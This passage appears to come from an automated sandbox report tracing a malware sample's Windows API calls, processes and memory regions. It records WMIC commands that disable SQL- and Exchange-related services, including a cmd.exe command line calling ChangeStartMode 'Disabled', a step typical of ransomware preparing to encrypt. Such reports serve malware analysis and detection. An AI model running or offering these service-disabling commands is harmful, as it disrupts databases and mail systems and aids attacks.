ppNewInstance=0x4ff7dc*=0x80b820) returned 0x0 [0115.799] IWbemClassObject:GetNames (in: This=0x80b2a8, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x4ff7e0 | out: pNames=0x4ff7e0*="\x01ƀ\x04") returned 0x0 [0115.799] SafeArrayGetLBound (in: psa=0x7bf220, nDim=0x1, plLbound=0x4ff78c | out: plLbound=0x4ff78c) returned 0x0 [0115.799] SafeArrayGetUBound (in: psa=0x7bf220, nDim=0x1, plUbound=0x4ff7d4 | out: plUbound=0x4ff7d4) returned 0x0 [0115.799] SafeArrayGetElement (in: psa=0x7bf220, rgIndices=0x4ff7c8, pv=0x4ff7f0 | out: pv=0x4ff7f0) returned 0x0 [0115.799] IWbemClassObject:GetPropertyQualifierSet (in: This=0x80b820, wszProperty="StartMode", ppQualSet=0x4ff6b0 | out: ppQualSet=0x4ff6b0*=0x7bdc50) returned 0x0 [0115.799] IWbemQualifierSet:Get (in: This=0x7bdc50, wszName="CIMTYPE", lFlags=0, pVal=0x4ff680*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x4ff680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0115.800] IWbemClassObject:Get (in: This=0x80b820, wszName="StartMode", lFlags=0, pVal=0x4ff658*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x4ff694*=5240444, plFlavor=0x0 | out: pVal=0x4ff658*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0x4ff694*=8, plFlavor=0x0) returned 0x0 [0115.800] IWbemQualifierSet:Get (in: This=0x7bdc50, wszName="read", lFlags=0, pVal=0x4ff698*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x4ff698*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0115.800] IWbemQualifierSet:Get (in: This=0x7bdc50, wszName="write", lFlags=0, pVal=0x4ff698*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x4ff698*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0115.800] IWbemQualifierSet:Get (in: This=0x7bdc50, wszName="Description", lFlags=0, pVal=0x4ff670*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x4ff670*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0115.800] lstrlenA (lpString="Not Available") returned 13 [0115.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301d64, cbMultiByte=-1, lpWideCharStr=0x769270, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0115.800] IUnknown:Release (This=0x7bdc50) returned 0x0 [0115.800] lstrlenW (lpString="StartMode") returned 9 [0115.800] lstrlenW (lpString="StartMode") returned 9 [0115.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="StartMode", cchCount1=9, lpString2="StartMode", cchCount2=9) returned 2 [0115.800] SysStringLen (param_1="In") returned 0x2 [0115.800] SysStringLen (param_1="MaxLen") returned 0x6 [0115.800] SysStringLen (param_1="ValueMap") returned 0x8 [0115.800] SysStringLen (param_1="MaxLen") returned 0x6 [0115.800] SysStringLen (param_1="MaxLen") returned 0x6 [0115.800] SysStringLen (param_1="ValueMap") returned 0x8 [0115.800] lstrlenW (lpString="") returned 0 [0115.800] lstrlenW (lpString="STRING") returned 6 [0115.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0115.800] lstrlenW (lpString="string") returned 6 [0115.800] lstrlenW (lpString="STRING") returned 6 [0115.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0115.801] SysStringLen (param_1="In") returned 0x2 [0115.801] SysStringLen (param_1="ValueMap") returned 0x8 [0115.801] SysStringLen (param_1="ValueMap") returned 0x8 [0115.801] SysStringLen (param_1="ValueMap") returned 0x8 [0115.801] SysStringLen (param_1="ValueMap") returned 0x8 [0115.801] SysStringLen (param_1="ValueMap") returned 0x8 [0115.801] lstrlenW (lpString="Boot") returned 4 [0115.801] lstrlenW (lpString="Disabled") returned 8 [0115.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Boot", cchCount2=4) returned 3 [0115.801] lstrlenW (lpString="System") returned 6 [0115.801] lstrlenW (lpString="Disabled") returned 8 [0115.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="System", cchCount2=6) returned 1 [0115.801] lstrlenW (lpString="Automatic") returned 9 [0115.801] lstrlenW (lpString="Disabled") returned 8 [0115.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Automatic", cchCount2=9) returned 3 [0115.801] lstrlenW (lpString="Manual") returned 6 [0115.801] lstrlenW (lpString="Disabled") returned 8 [0115.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Manual", cchCount2=6) returned 1 [0115.801] lstrlenW (lpString="Disabled") returned 8 [0115.801] lstrlenW (lpString="Disabled") returned 8 [0115.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Disabled", cchCount2=8) returned 2 [0115.801] IWbemClassObject:GetPropertyQualifierSet (in: This=0x80b820, wszProperty="StartMode", ppQualSet=0x4ff6b8 | out: ppQualSet=0x4ff6b8*=0x7bdf10) returned 0x0 [0115.801] IWbemQualifierSet:Get (in: This=0x7bdf10, wszName="CIMTYPE", lFlags=0, pVal=0x4ff69c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x4ff69c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0115.801] IWbemClassObject:Get (in: This=0x80b820, wszName="StartMode", lFlags=0, pVal=0x4ff68c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x4ff6ac*=5239852, plFlavor=0x0 | out: pVal=0x4ff68c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0x4ff6ac*=8, plFlavor=0x0) returned 0x0 [0115.801] IUnknown:Release (This=0x7bdf10) returned 0x0 [0115.801] lstrlenW (lpString="string") returned 6 [0115.801] lstrlenW (lpString="string") returned 6 [0115.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="string", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0115.802] IWbemClassObject:Put (This=0x80b820, wszName="StartMode", lFlags=0, pVal=0x4ff750*(varType=0x8, wReserved1=0x7c, wReserved2=0x6, wReserved3=0x0, varVal1="Disabled", varVal2=0x6), Type=0) returned 0x0 [0115.802] IUnknown:Release (This=0x80b2a8) returned 0x0 [0115.802] IUnknown:Release (This=0x80b628) returned 0x0 [0115.802] IUnknown:Release (This=0x80adb8) returned 0x0 [0115.802] ??0CHString@@QAE@XZ () returned 0x4ff69c [0115.802] GetCurrentThreadId () returned 0xf40 [0115.802] lstrlenA (lpString="") returned 0 [0115.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x769c28, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0115.802] lstrlenA (lpString="") returned 0 [0115.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x769c28, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0115.802] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0115.802] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0115.802] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x49886884 | out: _String="Select", _Context=0x49886884) returned="Select" [0115.802] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x49886884 | out: _String=0x0, _Context=0x49886884) returned="*" [0115.802] lstrlenW (lpString="FROM") returned 4 [0115.802] lstrlenW (lpString="*") returned 1 [0115.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0115.802] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x49886884 | out: _String=0x0, _Context=0x49886884) returned="from" [0115.802] lstrlenW (lpString="FROM") returned 4 [0115.802] lstrlenW (lpString="from") returned 4 [0115.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0115.802] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x49886884 | out: _String=0x0, _Context=0x49886884) returned="Win32_Service" [0115.803] lstrlenA (lpString="SELECT * FROM ") returned 14 [0115.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x769c28, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0115.803] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0115.803] SysStringLen (param_1="Win32_Service") returned 0xd [0115.803] lstrlenA (lpString=" WHERE ") returned 7 [0115.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x768c68, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0115.803] SysStringLen (param_1=" WHERE ") returned 0x7 [0115.803] SysStringLen (param_1="caption LIKE '%SQL%'") returned 0x14 [0115.803] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0115.803] SysStringLen (param_1=" WHERE caption LIKE '%SQL%'") returned 0x1b [0115.803] IWbemServices:ExecQuery (in: This=0x7b0ba0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%SQL%'", lFlags=48, pCtx=0x0, ppEnum=0x4ff6a4 | out: ppEnum=0x4ff6a4*=0x7d7880) returned 0x0 [0115.812] CoSetProxyBlanket (pProxy=0x7d7880, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0115.813] IEnumWbemClassObject:Next (in: This=0x7d7880, lTimeout=-1, uCount=0x1, apObjects=0x4ff6a8, puReturned=0x4ff694 | out: apObjects=0x4ff6a8*=0x0, puReturned=0x4ff694*=0x0) returned 0x1 [0116.263] IUnknown:Release (This=0x7d7880) returned 0x0 [0116.266] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.266] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.266] GetCurrentThreadId () returned 0xf40 [0116.266] ??0CHString@@QAE@PBG@Z () returned 0x4ff860 [0116.266] ??YCHString@@QAEABV0@PBG@Z () returned 0x4ff860 [0116.266] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x76a0b0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0116.266] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0116.267] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x769c28, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0116.267] __iob_func () returned 0x77ac1208 [0116.267] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0116.268] __iob_func () returned 0x77ac1208 [0116.268] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0116.268] ??1CHString@@QAE@XZ () returned 0x1 [0116.268] IUnknown:Release (This=0x7b0ba0) returned 0x0 [0116.269] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0116.269] _kbhit () returned 0x0 [0116.270] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0116.270] WbemLocator:IUnknown:Release (This=0x780500) returned 0x2 [0116.270] IUnknown:Release (This=0x7b0c40) returned 0x0 [0116.270] IUnknown:Release (This=0x7b0a60) returned 0x0 [0116.271] WbemLocator:IUnknown:Release (This=0x780500) returned 0x1 [0116.271] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0116.271] WbemLocator:IUnknown:Release (This=0x780500) returned 0x0 [0116.272] CoUninitialize () [0116.286] exit (_Code=0) [0116.286] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.286] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 261 os_tid = 0xf44 Thread: id = 262 os_tid = 0xf48 Thread: id = 263 os_tid = 0xf4c Thread: id = 264 os_tid = 0xf50 Process: id = "58" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x685d9000" os_pid = "0xf54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3810 start_va = 0x320000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3811 start_va = 0x340000 end_va = 0x341fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 3812 start_va = 0x350000 end_va = 0x363fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 3813 start_va = 0x370000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 3814 start_va = 0x3b0000 end_va = 0x3b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 3815 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3816 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3817 start_va = 0x4410000 end_va = 0x450ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 3818 start_va = 0x4510000 end_va = 0x4510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 3819 start_va = 0x4520000 end_va = 0x4521fff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 3820 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3821 start_va = 0x7f680000 end_va = 0x7f6a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f680000" filename = "" Region: id = 3822 start_va = 0x7f6a6000 end_va = 0x7f6a6fff entry_point = 0x0 region_type = private name = "private_0x000000007f6a6000" filename = "" Region: id = 3823 start_va = 0x7f6ab000 end_va = 0x7f6abfff entry_point = 0x0 region_type = private name = "private_0x000000007f6ab000" filename = "" Region: id = 3824 start_va = 0x7f6ad000 end_va = 0x7f6affff entry_point = 0x0 region_type = private name = "private_0x000000007f6ad000" filename = "" Region: id = 3825 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3826 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3827 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 3828 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3829 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 3830 start_va = 0x45d0000 end_va = 0x45dffff entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 3831 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3832 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3833 start_va = 0x47a0000 end_va = 0x489ffff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 3834 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3875 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 3876 start_va = 0x4530000 end_va = 0x456ffff entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 3877 start_va = 0x45e0000 end_va = 0x469dfff entry_point = 0x45e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3878 start_va = 0x46a0000 end_va = 0x479ffff entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 3879 start_va = 0x49f0000 end_va = 0x49fffff entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 3880 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3881 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3882 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3883 start_va = 0x7f580000 end_va = 0x7f67ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f580000" filename = "" Region: id = 3884 start_va = 0x7f6a8000 end_va = 0x7f6aafff entry_point = 0x0 region_type = private name = "private_0x000000007f6a8000" filename = "" Region: id = 3885 start_va = 0x330000 end_va = 0x333fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3886 start_va = 0x340000 end_va = 0x343fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 3887 start_va = 0x4a00000 end_va = 0x4d36fff entry_point = 0x4a00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 265 os_tid = 0xf58 [0116.459] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0116.459] __set_app_type (_Type=0x1) [0116.459] __p__fmode () returned 0x77ac4d6c [0116.459] __p__commode () returned 0x77ac5b1c [0116.459] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0116.459] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0116.459] GetCurrentThreadId () returned 0xf58 [0116.459] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf58) returned 0x84 [0116.459] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0116.459] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0116.459] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.462] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x450f7e8 | out: phkResult=0x450f7e8*=0x0) returned 0x2 [0116.462] VirtualQuery (in: lpAddress=0x450f7ef, lpBuffer=0x450f7a0, dwLength=0x1c | out: lpBuffer=0x450f7a0*(BaseAddress=0x450f000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0116.462] VirtualQuery (in: lpAddress=0x4410000, lpBuffer=0x450f7a0, dwLength=0x1c | out: lpBuffer=0x450f7a0*(BaseAddress=0x4410000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0116.462] VirtualQuery (in: lpAddress=0x4411000, lpBuffer=0x450f7a0, dwLength=0x1c | out: lpBuffer=0x450f7a0*(BaseAddress=0x4411000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0116.462] VirtualQuery (in: lpAddress=0x4413000, lpBuffer=0x450f7a0, dwLength=0x1c | out: lpBuffer=0x450f7a0*(BaseAddress=0x4413000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0116.462] VirtualQuery (in: lpAddress=0x4510000, lpBuffer=0x450f7a0, dwLength=0x1c | out: lpBuffer=0x450f7a0*(BaseAddress=0x4510000, AllocationBase=0x4510000, AllocationProtect=0x2, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0116.462] GetConsoleOutputCP () returned 0x1b5 [0116.462] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0116.463] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0116.463] _get_osfhandle (_FileHandle=1) returned 0x3c [0116.463] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0116.463] _get_osfhandle (_FileHandle=1) returned 0x3c [0116.463] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0116.463] _get_osfhandle (_FileHandle=1) returned 0x3c [0116.463] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0116.463] _get_osfhandle (_FileHandle=0) returned 0x38 [0116.463] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0116.463] _get_osfhandle (_FileHandle=0) returned 0x38 [0116.463] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0116.463] GetEnvironmentStringsW () returned 0x47a7e10* [0116.464] FreeEnvironmentStringsA (penv="A") returned 1 [0116.464] GetEnvironmentStringsW () returned 0x47a7e10* [0116.464] FreeEnvironmentStringsA (penv="A") returned 1 [0116.464] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x450e74c | out: phkResult=0x450e74c*=0x94) returned 0x0 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x0, lpData=0x450e758*=0xf8, lpcbData=0x450e754*=0x1000) returned 0x2 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x4, lpData=0x450e758*=0x1, lpcbData=0x450e754*=0x4) returned 0x0 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x0, lpData=0x450e758*=0x1, lpcbData=0x450e754*=0x1000) returned 0x2 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x4, lpData=0x450e758*=0x0, lpcbData=0x450e754*=0x4) returned 0x0 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x4, lpData=0x450e758*=0x40, lpcbData=0x450e754*=0x4) returned 0x0 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x4, lpData=0x450e758*=0x40, lpcbData=0x450e754*=0x4) returned 0x0 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x0, lpData=0x450e758*=0x40, lpcbData=0x450e754*=0x1000) returned 0x2 [0116.464] RegCloseKey (hKey=0x94) returned 0x0 [0116.464] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x450e74c | out: phkResult=0x450e74c*=0x94) returned 0x0 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x0, lpData=0x450e758*=0x40, lpcbData=0x450e754*=0x1000) returned 0x2 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x4, lpData=0x450e758*=0x1, lpcbData=0x450e754*=0x4) returned 0x0 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x0, lpData=0x450e758*=0x1, lpcbData=0x450e754*=0x1000) returned 0x2 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x4, lpData=0x450e758*=0x0, lpcbData=0x450e754*=0x4) returned 0x0 [0116.464] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x450e750, lpData=0x450e758, lpcbData=0x450e754*=0x1000 | out: lpType=0x450e750*=0x4, lpData=0x450e758*=0x9, lpcbData=0x450e754*=0x4) returned 0x0 [0116.464] RegQueryValueExW (in: 